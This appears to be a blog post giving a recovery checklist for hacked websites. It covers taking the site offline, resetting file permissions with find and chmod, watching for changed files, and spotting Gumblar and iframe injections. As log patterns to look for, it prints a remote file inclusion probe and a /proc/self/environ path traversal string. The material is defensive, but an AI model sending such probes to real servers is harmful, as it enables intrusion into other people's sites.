Security Checklist: Have you been hacked?


Action List

Take your website offline (We recommend the htaccess method)
  • Scan all machines with FTP, super admin, and admin access for malware, virus, trojans, spyware, etc. (see Local Security below)

  • Notify your host and work with them to clean up the site, and to make sure there are no back doors to your site.

  • See if you have any vulnerable extensions and deal with them. A clue to any extensions being targeted is your logs file. Here is an example of what to look for.

//administrator/components/com_extension/admin.extension.php?mosConfig.absolute.path=http:

Or

../../../../../../../../../../../../../../../../proc/self/environ

chmod and cron

If you have permissions to access SSH (secure shell) via putty you can chmod the files and directories. If you do not have shell access, you can run the commands from cron by setting up a temporary cron job. Copy and paste the command into a cron job. Run the job about 2 minutes after saving the job. When using the command by putty or a cron job, the use of the full physical path to public_html is recommended for best results.

For files use:

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type f -exec chmod 644 {} \;

or

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type d -exec chmod 755 {} \;

Monitoring for File Changes

To check for recent file changes on your system use these commands from putty (SSH - secure shell) or via a cron job. If you run the command from a cron job you can schedule it to check for changed files several times each day. Results will be sent to the domain account owner and show the time/date stamp for any changed files. When using the command by putty or a cron job, the use of the full physical path to public_html is recommended for best results.

find /home/xxxxxx/domains/xxxxxxx.com/public_html -type f -ctime -1 -exec ls -ls {} \;

Please note your sites files may be located in public_html, httpdocs, www, or a similar place, and your physical path may also be different than in the examples. Adjust the physical path accordingly.

Malicious Code or Odd Links appearing on your site

Check that the original template file does or does not insert the unwanted code/Malicious Javascript or that you downloaded a paid for template from a non trusted source eg file sharing sites

Gumblar doesn’t use any particular script vulnerability. This script is injected into every web page ( I would imagine though not confirmed, if infected page is edited then saved it will also be in database) on a site. Script changes every time it is accessed. It has been seen on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, on proprietary PHP sites. The script starts with (function( and has no name and is obfusticated. A common Gumblar version breaks sites due to a bug in script.

iFrames

In recent iframe exploits the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.). Related Forum Sticky

#linux #metasploit #coding #security #cybersecurity

Recent Posts 
Serach By Tags
No tags yet.